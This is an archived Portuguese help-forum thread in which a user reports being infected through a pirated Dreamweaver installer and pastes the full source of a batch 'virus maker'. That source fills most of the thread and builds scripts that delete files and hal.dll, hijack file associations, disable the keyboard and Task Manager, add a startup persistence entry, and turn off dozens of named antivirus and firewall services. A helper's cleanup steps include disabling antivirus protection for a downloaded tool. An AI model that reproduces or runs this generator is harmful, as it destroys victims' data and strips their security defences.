[Arquivado] Me Hackearam mas consegui pegar o vírus.

[AyrtonMaia 0]

Hackearam meu PC. o virus veio de um dreamweaver q eu baixei na net, passei verificação do kaspersky mais ele nao pegou nada entao executei a instalação e até ai tdbem entao do nada um programa abriu no meu pc com um slider dizendo: hackeado by z3us e abriu o dos com uns negocios lá. Consegui pegar i slider e pega um arquivo bomba.exe e o arquivo bomba.bat, no arquivo bomba.bat tinha o seguinte código:

@echo offtitle BATBOMBGEN 2.0clsecho.echo.echo					  ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»echo					  ³ °±²Û C05t4Nt1n0 VirUs Maker 2.0 Û²±° ³echo					  ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄļecho.echo.echo.	 Fuck L4mm3recho	  ÄÄÄÄÄÄÄÄÄÄÄÄ:1set pp=%set pd=0set host=>>%homedrive%\windows\system32\Drivers\Etc\Hostsset /p name=Nome Autor:set /p namev=Nome Virus:echo > badcom.bat :%name%echo :%namev% >> badcom.batecho @echo off >> badcom.batecho cls >> badcom.batclsecho.echo.echo					  ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»echo					  ³ °±²Û C05t4Nt1n0 VirUs Maker 2.0 Û²±° ³echo					  ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄļecho.echo.echo.	 Fuck L4mm3recho	  ÄÄÄÄÄÄÄÄÄÄÄÄ:3echo.echo.echo Selecione o Payload (FUNCAO):echo.echo (1) Corromper Licensa do Windowsecho (2) deletar extencao expecificaecho (3) Confundir SHELLecho (4) Desligarecho (5) matar explorerecho (6) desativar tecladoecho (7) fechar programaecho (8) deletar componentes do Painel de Controleecho.echo.set /p op3=opcao:if %op3%== 1 goto licif %op3%== 2 goto extdif %op3%== 3 goto exassif %op3%== 4 goto shutif %op3%== 5 goto tskilif %op3%== 6 goto keyif %op3%== 7 goto closeif %op3%== 8 goto cpdel@msg * opcao invalida %op3%goto 3exit:licecho REG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WPAEvents" /v OOBETimer /t REG_DWORD /d 0 /f >> badcom.batecho alguma outra opcao ? (s/n)set /p sn1=:if %sn1%== s goto 3if %sn1%== n goto 4@msg * opcao invalida %sn1%exit:extdecho entre com a extencaoecho.set /p ext=extencao:echo del /s /q /f *.%ext% >> badcom.batecho cd \ >> badcom.batecho del /s /q /f *.%ext% >> badcom.batecho alguma outra opcao ? (s/n)set /p sn2=:if %sn2%== s goto 3if %sn2%== n goto 4@msg * opcao invalida %sn1%exit:exassecho assoc .exe=vbsfile >> badcom.batecho assoc .mp3=VBSFile >> badcom.batecho assoc .wmv=themefile >> badcom.batecho assoc .cpl=vbsfile >> badcom.batecho assoc .pif=vbsfile >> badcom.batecho assoc .lnk=vbsfile >> badcom.batecho assoc .scr=exefile >> badcom.batecho assoc .txt=vbsfile >> badcom.batecho alguma outra opcao ? (s/n)set /p sn3=:if %sn3%== s goto 3if %sn3%== n goto 4@msg * opcao invalida %sn1%exit:shutecho (r) reiniciarecho (s) desligarset /p fun=:echo.echo.echo tempo:set /p tim=(segundos):echo shutdown /%fun% /f /t %tim% /c "c05t4nt1n0 Virus Gen" >> badcom.batecho alguma outra opcao ? (s/n)set /p sn4=:if %sn4%== s goto 3if %sn4%== n goto 4@msg * opcao invalida %sn4%exit:tskilecho taskkill -f -im explorer.exe >> badcom.batecho alguma outra opcao ? (s/n)set /p sn5=:if %sn5%== s goto 3if %sn5%== n goto 4@msg * opcao invalida %sn5%exit:keyecho REG ADD "HKCU\Control Panel\Accessibility\Keyboard Response" /v Flags /t REG_SZ /d 127 /f  >> badcom.batecho REG ADD "HKCU\Control Panel\Accessibility\SoundSentry" /v Flags /t REG_SZ /d 3 /f  >> badcom.batecho REG ADD "HKCU\Control Panel\Accessibility\SoundSentry" /v WindosEffect /t REG_SZ /d 3 /f >> badcom.batecho alguma outra opcao ? (s/n)set /p sn6=:if %sn6%== s goto 3if %sn6%== n goto 4@msg * opcao invalida %sn6%exit :closeecho coloque o endereco do programaecho exemplo: C:\windows\explorer.exeecho.echo.set /p app=:echo rundll32.exe C:\WINDOWS\system32\sysdm.cpl,NoExecuteProcessException %app% >> badcom.batecho alguma outra opcao ? (s/n)set /p sn7=:if %sn7%== s goto 3if %sn7%== n goto 4@msg * opcao invalida %sn7%exit:cpdelecho cd %systemroot% >> badcom.batecho cd system32 >> badcom.batecho del /s /q /f *.cpl >> badcom.batecho alguma outra opcao ? (s/n)set /p sn8=:if %sn8%== s goto 3if %sn8%== n goto 4@msg * opcao invalida %sn8%exit:4clsecho.echo.echo					  ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»echo					  ³ °±²Û C05t4Nt1n0 VirUs Maker 2.0 Û²±° ³echo					  ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄļecho.echo.echo.	 Fuck L4mm3recho	  ÄÄÄÄÄÄÄÄÄÄÄÄecho Deseja que o virus afete o setor de boot? (S/N)set /p sn=:if %sn%== s goto bootif %sn%== n goto 5@msg * opcao Invalidaexit:bootecho cd %systemroot% >> badcom.batecho cd system32 >> badcom.batecho del /s /q /f hal.dll >> badcom.batcls:5echo					  ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»echo					  ³ °±²Û C05t4Nt1n0 VirUs Maker 2.0 Û²±° ³echo					  ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄļecho.echo.echo.	 Fuck L4mm3recho	  ÄÄÄÄÄÄÄÄÄÄÄÄecho.echo.echo deseja usar tecnica AV_FW-KILL? (S/N)echo.echo.set /p sn2=:if %sn2%== s goto fwif %sn2%== n goto 7@msg * opcao invalidaexit:fwecho net stop SharedAccess >> badcom.bat echo reg add "HKCU\Software\Microsoft\windows\CurrentVersion\Policies" /v NoDispAppearancePage /t reg_DWORD /d 00000000 /f >> badcom.batecho reg add "HKCU\Software\Microsoft\windows\CurrentVersion\Policies" /v NoDispSettingsPage /t reg_DWORD /d 00000000 /f >> badcom.bat echo reg add "HKCU\Software\Microsoft\windows\CurrentVersion\Policies" /v NoSecCPL /t reg_DWORD /d 00000000 /f >> badcom.batecho reg add "HKLM\Software\Microsoft\windows\CurrentVersion\Policies" /v NoPwdPage /t reg_DWORD /d 00000000 /f >> badcom.batecho reg add "HKCU\Software\Microsoft\windows\CurrentVersion\Policies" /v NoProfilePage /t reg_DWORD /d 00000000 /f >> badcom.batecho reg add "HKCU\Software\Microsoft\windows\CurrentVersion\Policies" /v NoFileSysPage /t reg_DWORD /d 00000000 /f >> badcom.batecho reg add "HKCU\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer" /v NoAutoUpdate /t reg_DWORD /d 00000001 /f >> badcom.batecho reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v oobe /t REG_SZ /d C:\oobe.bat -hide /f >> badcom.bat echo reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f >> badcom.bat echo reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f >> badcom.bat echo reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WPAEvents" /v OOBETimer /t REG_DWORD /d 0 /f >> badcom.bat echo reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\ /v DataBasePath /t REG_EXPAND_SZ /d "%systemroot%\System32\drivers\etc /f >> badcom.bat" echo reg add HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices /v Pwner /t REG_SZ /d %systemroot%\system32\ni0Ck08.exe /f >> badcom.bat >nulecho reg add "HKCU\Control Panel\Accessibility\Keyboard Response" /v Flags /t REG_SZ /d 127 /f >> badcom.bat echo reg add "HKCU\Control Panel\Accessibility\SoundSentry" /v Flags /t REG_SZ /d 3 /f >> badcom.bat echo reg add "HKCU\Control Panel\Accessibility\SoundSentry" /v WindosEffect /t REG_SZ /d 3 /f >> badcom.bat echo reg add "HKCU\Software\Microsoft\windows\CurrentVersion\Policies" /v NoDispAppearancePage /t reg_DWORD /d 00000000 /f >> badcom.batecho reg add "HKCU\Software\Microsoft\windows\CurrentVersion\Policies" /v NoDispSettingsPage /t reg_DWORD /d 00000000 /f >> badcom.batecho reg add "HKCU\Software\Microsoft\windows\CurrentVersion\Policies" /v NoSecCPL /t reg_DWORD /d 00000000 /f >> badcom.batecho reg add "HKLM\Software\Microsoft\windows\CurrentVersion\Policies" /v NoPwdPage /t reg_DWORD /d 00000000 /f >> badcom.bat echo reg add "HKCU\Software\Microsoft\windows\CurrentVersion\Policies" /v NoProfilePage /t reg_DWORD /d 00000000 /f >> badcom.batecho reg add "HKCU\Software\Microsoft\windows\CurrentVersion\Policies" /v NoFileSysPage /t reg_DWORD /d 00000000 /f >> badcom.batecho reg add "HKCU\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer" /v NoAutoUpdate /t reg_DWORD /d 00000001 /f >> badcom.batecho reg add "HKLM\software\microsoft\security center" /v AntiVirusDisableNotify /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\software\microsoft\security center" /v AntiVirusOverride /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\software\microsoft\security center" /v FirewallDisableNotify /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\software\microsoft\security center" /v FirewallOverride /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\software\microsoft\security center" /v FirstRunDisabled /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\software\microsoft\security center" /v UpdatesDisableNotify /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\SharedAccess" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\SharedAccess" /v ErrorControl /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\SharedAccess" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\SharedAccess" /v ErrorControl /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\SharedAccess" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\SharedAccess" /v ErrorControl /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\AVPCC" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\AVPCC" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\AVPCC" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Amon" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Amon" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Amon" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Apvxd" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Apvxd" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Apvxd" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Apvxdwin" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Apvxdwin" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Apvxdwin" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Atrack" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Atrack" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Atrack" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\AvconsoleEXE" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\AvconsoleEXE" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\AvconsoleEXE" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\AVG_CC" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\AVG_CC" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\AVG_CC" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\avgcc32" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\avgcc32" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\avgcc32" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\avgserv9" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\avgserv9" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\avgserv9" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\AVPCC Service" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\AVPCC Service" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\AVPCC Service" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\BlackIce Utility" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\BlackIce Utility" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\BlackIce Utility" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\CcApp" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\CcApp" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\CcApp" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\CcRegVfy" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\CcApp" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\CcApp" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\ConfigSafe" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\ConfigSafe" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\ConfigSafe" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\CPD_EXE" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\CPD_EXE" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\CPD_EXE" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Defwatch" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Defwatch" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Defwatch" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\dvpapi9x" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\dvpapi9x" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\dvpapi9x" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Fix-it" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Fix-it" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Fix-it" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Fix-it AV" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Fix-it AV" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Fix-it AV" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Freedom" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Freedom" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Freedom" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\F-StopW" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\F-StopW" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\F-StopW" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\iamapp" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\iamapp" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\iamapp" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Look 'n' Stop" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Look 'n' Stop" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Look 'n' Stop" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\McAfee Firewall" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\McAfee Firewall" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\McAfee Firewall" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\McAfee Winguage" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\McAfee Firewall" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\McAfee Firewall" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\McAfee.InstantUpdate.Monitor" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\McAfee.InstantUpdate.Monitor" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\McAfee.InstantUpdate.Monitor" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\McAfeeVirusScanService" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\McAfeeVirusScanService" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\McAfeeVirusScanService" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\NAV Agent" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\NAV Agent" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\NAV Agent" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\NAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\NAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\NAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\NAV DefAlert" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\NAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\NAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Nod32CC" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Nod32CC" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\CURRENTcontrolset\services\Nod32CC" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\NOD32POP3" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\NOD32POP3" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\NOD32POP3" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Norton Auto-Protect" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Norton Auto-Protect" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Norton Auto-Protect" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Norton eMail Protect" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Norton eMail Protect" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Norton eMail Protect" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Norton Navigaton Loader" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Norton Navigaton Loader" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Norton Navigaton Loader" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Norton Program Scheduler" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Norton Program Scheduler" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Norton Program Scheduler" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Norton Program Event Checker" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Norton Program Event Checker" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Norton Program Event Checker" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\NPS Event Checker" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\NPS Event Checker" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\NPS Event Checker" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Panda Scheduler" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Panda Scheduler" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Panda Scheduler" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\ScanInicio" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\ScanInicio" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\ScanInicio" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\SymTray - Norton SystemWorks" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\SymTray - Norton SystemWorks" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\SymTray - Norton SystemWorks" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Tiny Personal Firewall" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Tiny Personal Firewall" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Tiny Personal Firewall" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\TrueVector" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\TrueVector" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\TrueVector" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\VirusScan Online" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\VirusScan Online" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\VirusScan Online" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\ZoneAlarm" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\ZoneAlarm" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\ZoneAlarm" /v Start /t REG_DWORD /d 4 /f >> badcom.batclsexit

será que este código prejudicou mais alguma coisa no meu computador? eu fechei o dos na mesma hora que abriu. logo quando apareceu o slide eu já desconectei a internet entao o lammer não pode fazer muita coisa"eu axo"

[DigRam 144]

Bom Dia! AyrtonMaia

 

<@> Faça o download do '>http://www.trendsecure.com/portal/en-US/_download/HiJackThis.exe"]HijackThis.

<@> Baixe-o para o Arquivos de programas!

<@> Mas,não execute-o ainda!

<@> Para que o Log do HijackThis saia completo,vá em Iniciar --> Executar.

<@> Digite: msconfig --> Clique Ok.

<@> Na janela que abrir,marque: Inicialização normal - Carregar todos os drivers de dispositivo e serviços

<@> Clique em Aplicar --> Ok.

<@> Reinicie o computador!

<@> Execute o HijackThis.exe --> Clique em: Do a system scan and save a logfile

<@> Abrir-se-á um Bloco de Notas!

<@> Selecione e copie o seu conteúdo,para este Tópico.

<><><><><><><><><><>

<@> Baixe: < '>http://sd-1.archive-host.com/membres/up/116615172019703188/FindyKill.exe"]FindyKill > ( ...par Chiquitine29 )

<@> Salve-a em Arquivos de Programas!

<@> Feche programas que estejam abertos.

<@> Desabilite a proteção residente de antivírus e antispywares.

<@> Ps: A detecção dessa ferramenta,por antivírus,é um falso positivo!

<@> Instale a ferramenta,e aceite todas as condições pedidas.

<@> Terminando;execute a ferramenta com um duplo-clique,em: C:\Arquivos de Programas\FindyKill\FindyKill.bat <--

<@> No prompt,aperte o C. --> Enter. <-- Opção de linguas!

<@> À seguir,aperte o 2. ( "Eliminar los ficheros infectados" )

<@> Aperte Enter --> O computador vai reiniciar,por duas vezes! --> Aguarde!

<@> Terminando,clique em uma área vazia do prompt! --> Aperte Enter.

<@> Abrir-se-à o Bloco de Notas,com o relatório: C:\FindyKill.txt <-- Rapport!

<><><><><><><><><><>

<@> Baixe: < '>http://www.besttechie.net/tools/mbam-setup.exe"]Malwarebytes >

<@> Atualize o programa!

<@> Escolha o escaneamento Completo!

<@> Desabilite programas de proteção,ao executar o malwarebytes.

<@> Procure enviar os ítens detectados para a quarentena,clicando em Remover itens.

<@> Para maiores detalhes: < '>http://linhadefensiva.org/forum/index.php?showtopic=75554"]Link >

<><><><><><><><><><>

<@> Poste: mbam-log-2009-xx-xx (00-00-00).txt

 

Abraços!

[Mário Monteiro 179]

Tópico Arquivado

 

Como o autor não respondeu por mais de 30 dias, o tópico foi arquivado.

 

Caso você seja o autor do tópico e quer reabrir, envie uma mensagem privada para um moderador da área juntamente com o link para este tópico e explique o motivo da reabertura.

[Mário Monteiro 179]

Reaberto a pedido do autor

 

Aguardando log conforme regra 2

 

http://forum.imasters.com.br/index.php?showtopic=165906

[AyrtonMaia 0]

ultimamente estou sem tempo para pegar o log, mas alguem sabe o que este virus fez no meu pc ?

[DigRam 144]

ultimamente estou sem tempo para pegar o log, mas alguem sabe o que este virus fez no meu pc ?

<><><><><><><><>

Opa! AyrtonMaia

 

<!> Sem relatórios comprobatórios....quase impossível! :blink:

 

Abraços!

[Mário Monteiro 179]

Tópico Arquivado

 

Como o autor não respondeu por mais de 30 dias, o tópico foi arquivado.

 

Caso você seja o autor do tópico e quer reabrir, envie uma mensagem privada para um moderador da área juntamente com o link para este tópico e explique o motivo da reabertura.